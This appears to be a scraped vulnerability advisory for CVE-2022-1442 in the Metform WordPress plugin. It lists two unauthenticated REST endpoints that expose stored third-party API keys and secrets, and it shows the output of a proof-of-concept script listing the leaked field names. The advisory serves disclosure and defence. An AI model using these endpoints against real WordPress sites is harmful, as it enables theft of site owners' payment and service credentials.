Headline
CVE-2022-1442: WordPress Plugin Metform <= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure
The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
Metform contact form builder is an addon for elementor used to build any contact form on the fly with Metform drag and drop builder. It can manage multiple contact forms and one can customize the form with an elementor builder. Metform can be integrated with various third-party APIs.
API keys and secrets of third-part integrations can be added and viewed by Wordpress admins.
Vulnerability: The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.
/wp-json/metform/v1/forms/templates/0
/wp-json/metform/v1/forms/get/{form_id_here}
It will list all the juicy stuff.
/wp-content/plugins/metform/core/forms/action.php#L185 Vulnerable Method: get_all_data
public function get\_all\_data($post\_id) {
$post = get\_post($post\_id);
… … return $all_settings;
}
λ python poc.py
WordPress URL: http://192.168.0.112
Form ID: 123, Form Title: SomeFormTitle { "admin_email_attach_submission_copy": "", "admin_email_body": "", "admin_email_from": "", "admin_email_reply_to": "", "admin_email_subject": "", "admin_email_to": "", "aweber_opt": [], "capture_user_browser_data": "", "ckit_opt": [], "count_views": "", "email_verification_confirm_redirect": "", "email_verification_email_subject": "", "email_verification_enable": "", "email_verification_heading": "", "email_verification_paragraph": "", "enable_admin_notification": "", "enable_recaptcha": "", "enable_user_notification": "", "entry_title": "", "failed_cancel_url": "", "form_title": "", "hide_form_after_submission": "", "input_names": "", "limit_total_entries": "", "limit_total_entries_status": "", "mf_active_campaign": "", "mf_active_campaign_api_key": "", "mf_active_campaign_list_id": "", "mf_active_campaign_tag_id": "", "mf_active_campaign_url": "", "mf_automizy": "", "mf_automizy_api_token": "", "mf_automizy_list_id": "", "mf_aweber_dev_api_key": "", "mf_aweber_dev_api_sec": "", "mf_aweber_list_id": "", "mf_ckit_api_key": "", "mf_ckit_list_id": "", "mf_ckit_sec_key": "", "mf_convert_kit": "", "mf_fluent": "", "mf_fluent_webhook": "", "mf_form_to_post": "", "mf_get_reponse_api_key": "", "mf_get_response": "", "mf_get_response_list_id": "", "mf_google_map_api_key": "", "mf_google_sheet": "", "mf_google_sheet_client_id": "", "mf_google_sheet_client_secret": "", "mf_helpscout": "", "mf_helpscout_app_id": "", "mf_helpscout_app_secret": "", "mf_helpscout_conversation_customer_email": "", "mf_helpscout_conversation_customer_first_name": "", "mf_helpscout_conversation_customer_last_name": "", "mf_helpscout_conversation_customer_message": "", "mf_helpscout_conversation_subject": "", "mf_helpscout_mailbox": "", "mf_helpscout_token": "", "mf_hubsopt_token": "", "mf_hubspot": "", "mf_hubspot_form_guid": "", "mf_hubspot_form_portalId": "", "mf_hubspot_forms": "", "mf_login": "", "mf_mail_aweber": "", "mf_mail_chimp": "", "mf_mail_poet": "", "mf_mail_poet_list_id": "", "mf_mailchimp_api_key": "", "mf_mailchimp_list_id": "", "mf_mailster": "", "mf_mailster_fields": "", "mf_mailster_list_id": "", "mf_payment_currency": "", "mf_paypal": "", "mf_paypal_email": "", "mf_paypal_sandbox": "", "mf_paypal_token": "", "mf_post_submission_author": "", "mf_post_submission_content": "", "mf_post_submission_featured_image": "", "mf_post_submission_post_type": "", "mf_post_submission_title": "", "mf_recaptcha": "", "mf_recaptcha_secret_key": "", "mf_recaptcha_secret_key_v3": "", "mf_recaptcha_site_key": "", "mf_recaptcha_site_key_v3": "", "mf_recaptcha_version": "", "mf_registration": "", "mf_rest_api": "", "mf_rest_api_method": "", "mf_rest_api_url": "", "mf_slack": "", "mf_slack_webhook": "", "mf_sms_admin_body": "", "mf_sms_admin_status": "", "mf_sms_admin_to": "", "mf_sms_from": "", "mf_sms_status": "", "mf_sms_twilio_account_sid": "", "mf_sms_twilio_auth_token": "", "mf_sms_user_body": "", "mf_sms_user_status": "", "mf_stop_vertical_scrolling": "", "mf_stripe": "", "mf_stripe_image_url": "", "mf_stripe_live_publishiable_key": "", "mf_stripe_live_secret_key": "", "mf_stripe_sandbox": "", "mf_stripe_test_publishiable_key": "", "mf_stripe_test_secret_key": "", "mf_thank_you_page": "", "mf_zapier": "", "mf_zapier_webhook": "", "mf_zoho": "", "mf_zoho_token": "", "mp_opt": [], "multiple_submission": "", "redirect_to": "", "require_login": "", "store_entries": "1", "success_message": "", "success_url": "", "user_email_attach_submission_copy": "", "user_email_body": "", "user_email_from": "", "user_email_reply_to": "", "user_email_subject": “” }
Related news
The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.